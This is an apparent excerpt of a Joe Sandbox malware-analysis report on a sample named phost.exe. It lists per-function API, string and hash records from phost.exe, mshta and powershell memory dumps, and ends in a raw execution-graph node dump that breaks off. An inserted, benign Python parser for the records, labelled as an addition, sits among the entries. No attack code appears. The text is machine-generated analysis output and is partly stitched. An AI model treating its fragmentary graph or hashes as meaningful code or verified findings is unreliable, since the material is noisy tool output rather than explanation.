                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: 9e3e78a9366c6c5261d8b800243136ec92a4df68d373ed967d5fba4a87944466
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2251D372F081128AFF25DF289D55ABD27B1AB407B8F504235DE1ED2AE5DF39A4428701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
• Instruction ID: 29793d33bfc6032f87cb60117973c068b6ae1cb61288d16ba602b48e55620ad9
• Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
• Instruction Fuzzy Hash: 5D516D62F086418AFF11DF79D8507BE23B2AB48BA8F148635DE4D9B689DF78D4418702
APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction ID: cd2147f3bebf089ffe8f942daa7e0d08e6bf949f80addf632e2bc888a597300d
• Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction Fuzzy Hash: B411AC31F1C14282FE54976DED4427952B5FF857A4F448030DB498BB9DCD2DD899A602
APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction ID: 30a86eb453e76a9721887be65965a5b17c55db779209dd1300800f92d1fe55ff
• Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction Fuzzy Hash: 7F113A32B14F058AEF008F65EC542B933B4FB59B68F040E35DA6D867A4DF38D1658342
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC890B6
• Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
• Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62CC7CC15), ref: 00007FF62CC890D4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\phost.exe
• API String ID: 3580290477-3962158096
• Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
• Instruction ID: 6092133590d028b7397a533541ae74e3ffc510a30d331cd87eafde9870ce62ec
• Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
• Instruction Fuzzy Hash: 29416D32B08A5285EF1A9F29DC444BA23B4EB457E4B554135E94EC3B85DE3DE482C302
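The entries above are Joe Sandbox's per-function similarity records: each one lists the Win32/CRT calls the function reaches (directly, or through a callee marked "Part of subcall function"), the strings it references, and opcode and instruction hashes that can be compared against other samples. Below is an added example, not part of this report or of Joe Sandbox's own tooling, that parses such entries into records so the API references, the String ID and the fuzzy hashes can be queried and indexed. The sample input is copied from the two entries on this page; the "Download File" suffix the parser strips is the link text that the page extraction fused onto the dump names. Joe Sandbox's hashing algorithm is not reproduced here, so the index only matches identical hash strings.

```python
"""Parse the per-function 'IDA Plugin' entries of a Joe Sandbox report
into records: APIs referenced, String ID, opcode and instruction hashes."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API line: "• GetModuleFileNameW.KERNEL32(?,?,...), ref: 00007FF62CC890D4",
# optionally prefixed by "Part of subcall function <addr>:". The argument list
# is absent for CRT entries such as "_invalid_parameter_noinfo.LIBCMT ref: ...".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiRef:
    api: str
    module: str
    ref: str                   # address of the call site in the dump
    subcall_of: Optional[str]  # set when the call is inside a callee, not this function


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # "Opcode ID", "Instruction Fuzzy Hash", ...
    associated: list = field(default_factory=list)  # associated memory dump names

    def direct_api_names(self):
        return [a.api for a in self.apis if a.subcall_of is None]


def parse_entries(text):
    """Split report text into FunctionEntry records; an entry starts at each 'APIs' header."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue  # fragment before the first "APIs" header (a truncated entry)
        m = API_LINE.match(line)
        if section == "APIs" and m:
            cur.apis.append(ApiRef(m["api"], m["mod"], m["ref"], m["subfn"]))
            continue
        key, sep, value = line.lstrip("•").strip().partition(":")
        if not sep:
            continue
        value = value.strip()
        if key == "Associated":
            cur.associated.append(value.removesuffix("Download File"))  # fused link text
        else:
            cur.fields[key] = value
    return entries


def index_by_fuzzy_hash(entries):
    """Map Instruction Fuzzy Hash -> entry, for exact-match lookups across samples."""
    return {e.fields["Instruction Fuzzy Hash"]: e
            for e in entries if "Instruction Fuzzy Hash" in e.fields}


# Sample input: two entries copied from the phost.exe report text above.
SAMPLE = r"""
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC890B6
• Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
• Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62CC7CC15), ref: 00007FF62CC890D4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\phost.exe
• API String ID: 3580290477-3962158096
• Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
• Instruction ID: 6092133590d028b7397a533541ae74e3ffc510a30d331cd87eafde9870ce62ec
• Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
• Instruction Fuzzy Hash: 29416D32B08A5285EF1A9F29DC444BA23B4EB457E4B554135E94EC3B85DE3DE482C302
APIs
Strings
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Instruction Fuzzy Hash: 94214872B0868182FF218B19D81463E33B1FB84B94F918235C68C83288DF7DE545C742
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.fields.get("API ID"), e.direct_api_names(), repr(e.fields.get("String ID")))
```

Feeding the whole report section through parse_entries gives one record per function; the direct API names plus the String ID are usually enough to tell CRT and PyInstaller bootloader housekeeping (GetModuleFileNameW resolving its own path, GetCurrentDirectory, GetDriveType) from the functions worth opening in the disassembler, and the fuzzy-hash index lets the same functions be recognised in the next build of the sample.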
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
• Instruction ID: 9d2c86d8cd478c54ee3e874a0b3b69098077f951905a6eb395963df330aed0fa
• Opcode Fuzzy Hash: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
• Instruction Fuzzy Hash: 94214872B0868182FF218B19D81463E33B1FB84B94F918235C68C83288DF7DE545C742
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction ID: c61f3df4c510bdd12ff0e8001e60e0a1449cac8e2fbe8132dc8b29c4fa9e55af
• Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction Fuzzy Hash: 92112E32618B8182EB618F19F94026977F4FB88B98F588230DA8D4B755DF3DD5558B01
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
• Instruction ID: c9f46e3962f408f0fb48dcd015578d8f863998336716b95769d9c5b2823da4c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71017C22B1824386FF21AF68986627E67B0EF48778F80413AD54DC6691DE3CE504DA56
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000003.1750099323.00000209ABCB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000209ABCB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_3_209abcb0000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction ID: ced73fdcfaad286b6318cbdea608af9686425220c1b85d832fd56503da5f28f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA9004047D551F75D41411D50C5DF5C517073CC170FD4C5C04457D0147D44D43D75153
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: iR_L
                                                                                                                                                                                                                              • API String ID: 0-1243337067
                                                                                                                                                                                                                              • Opcode ID: b1aefb1552c0dae6aabad975546d9a58b0f591f318723bc2629ffc422ef22ad5
                                                                                                                                                                                                                              • Instruction ID: be47889c21f230b3bd67dbab338e7b51be0e22f86a6f7c39e0f0b083854a3c20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1aefb1552c0dae6aabad975546d9a58b0f591f318723bc2629ffc422ef22ad5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0751463260DB894FE759DF28C8A58647BE1FF56318B1800BED4CAC71A7E919A807C742
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1832061601.00007FFD992C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD992C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd992c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3d1e7d8430679f3eb70157400454396753b0ef7f9c4fb9f713c2d28f4a329962
                                                                                                                                                                                                                              • Instruction ID: 4238ff2f2e86a6a0580251a2ca6d673d3fbff955056a34d6da511c790d93fd21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d1e7d8430679f3eb70157400454396753b0ef7f9c4fb9f713c2d28f4a329962
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50825822B0EBC90FF766AB6858255B57FE1EF9A214B5801FBD089C71D3E9186C078353
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1832061601.00007FFD992C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD992C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd992c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2f4777f422e77ef4fb9a7bb8236b10a6b72b0eba5655a3cd291d222910bd7dbb
                                                                                                                                                                                                                              • Instruction ID: 4314d03cfe38f4d1068f395c7e7ac980f01b14c414c15c032a0c020cd576788b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f4777f422e77ef4fb9a7bb8236b10a6b72b0eba5655a3cd291d222910bd7dbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7D13B22A0DACB4FFB65EFA848645B57B91EF66318B5801FED05DC70D3E919AC06C342
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 530a0ad2a8b6960f29f60117b27c01e82209e6622fc8c0d887166e41ace8f62a
                                                                                                                                                                                                                              • Instruction ID: 3aed97073ce0dbadffada5973a48f751f0d0d971a23cd7c4d61886fb35d959f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 530a0ad2a8b6960f29f60117b27c01e82209e6622fc8c0d887166e41ace8f62a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33B13371B1CB484FE759DF18C895AB5BBE0FF95310F14017ED08AC32A6DA25A846CB42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dfafa6b1d014dc1e1cd631303064e13b9ebd4061e2eb6ea1de4978c28c4f1bae
                                                                                                                                                                                                                              • Instruction ID: 2894222eb5659c05e88333c6006d91ac7d03c5b0945cdb0d7cfd2399ed9fe8c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfafa6b1d014dc1e1cd631303064e13b9ebd4061e2eb6ea1de4978c28c4f1bae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED41FAA3B0E9DA4BE712CF6888A60D43BA0FF21118B4841F6C4DD8A0D7FD19241AC653
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5a5dc842ba9796f0abfe717635209f3b0bf18c91340aa70f0c6dcb3e5063f0f6
                                                                                                                                                                                                                              • Instruction ID: c6e67d33893079db4d980f321ac252a27810119ad8585e81e8b7ccca32078dfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a5dc842ba9796f0abfe717635209f3b0bf18c91340aa70f0c6dcb3e5063f0f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D412671A0CB8C4FDB189F5C9C466E97BE1FBA9311F04426FE45993292CA21A815CBC3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1818283992.00007FFD990DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD990DD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd990dd000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 738cb5dde214f442d8b6ee4226b23663e327ca49a86fe749230b19a4ae7085fa
                                                                                                                                                                                                                              • Instruction ID: 8d30902c9c3e0e70108b82b6fed905ce3b08c58fb41563a67a05411648e94bb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 738cb5dde214f442d8b6ee4226b23663e327ca49a86fe749230b19a4ae7085fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66412A7180DBC44FE7568B299855A523FF0EF52364F1606DFE088CB1A3D625E846C7A3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1832061601.00007FFD992C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD992C0000, based on PE: false

Execution Graph

Execution Coverage: 8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.5%
Total number of Nodes: 1246
Total number of Limit Nodes: 40
39258 7ff6bbcb7325 39257->39258 39258->39026 39258->39028 39269 7ff6bbcf7d80 39259->39269 39265 7ff6bbcf4b2b 39264->39265 39266 7ff6bbcf4b26 39264->39266 39265->39241 39268 7ff6bbcf4b38 8 API calls _handle_error 39266->39268 39268->39265 39276 7ff6bbcf8094 39269->39276 39272 7ff6bbcd8a44 39273 7ff6bbcd8a5a memcpy_s 39272->39273 39280 7ff6bbcfbac4 39273->39280 39277 7ff6bbcf809f 39276->39277 39278 7ff6bbcf7ec8 68 API calls 39277->39278 39279 7ff6bbcd896e 39278->39279 39279->39272 39283 7ff6bbcfba70 GetCurrentProcess GetProcessAffinityMask 39280->39283 39284 7ff6bbcd89c5 39283->39284 39284->39028 39286 7ff6bbce9245 39285->39286 39293 7ff6bbcd6194 39286->39293 39288 7ff6bbce92b1 39289 7ff6bbcd6194 72 API calls 39288->39289 39290 7ff6bbce92bd 39289->39290 39291 7ff6bbcd6194 72 API calls 39290->39291 39292 7ff6bbce92c9 39291->39292 39294 7ff6bbcd61b4 39293->39294 39297 7ff6bbcd61cb 39293->39297 39298 7ff6bbcfb850 72 API calls 39294->39298 39297->39288 39299->39039 39300->39043 39301->39046 39302->39049 39303->39038 39304->39041 39305->39037 39306->39054 39307 7ff6bbcfbb70 39310 7ff6bbcfbb80 39307->39310 39319 7ff6bbcfbae8 39310->39319 39312 7ff6bbcfbb79 39313 7ff6bbcfbb97 39313->39312 39324 7ff6bbcc1690 39313->39324 39315 7ff6bbcfbbd5 LeaveCriticalSection 39317 7ff6bbcfbae8 67 API calls 39315->39317 39316 7ff6bbcfbbc8 SetEvent 39316->39315 39317->39313 39328 7ff6bbcfb974 WaitForSingleObject 39319->39328 39322 7ff6bbcfbb12 39322->39313 39323 7ff6bbcfbb16 EnterCriticalSection LeaveCriticalSection 39323->39322 39325 7ff6bbcc16a4 39324->39325 39326 7ff6bbcc16c2 EnterCriticalSection 39324->39326 39325->39326 39336 7ff6bbcc1180 39325->39336 39326->39315 39326->39316 39329 7ff6bbcfb9b7 39328->39329 39330 7ff6bbcfb986 GetLastError 39328->39330 39329->39322 39329->39323 39334 7ff6bbccca6c 48 API calls 2 library calls 39330->39334 39332 7ff6bbcfb9a6 39335 7ff6bbccca40 61 API calls _CxxThrowException 39332->39335 39334->39332 39335->39329 39337 7ff6bbcc11ab 39336->39337 39345 
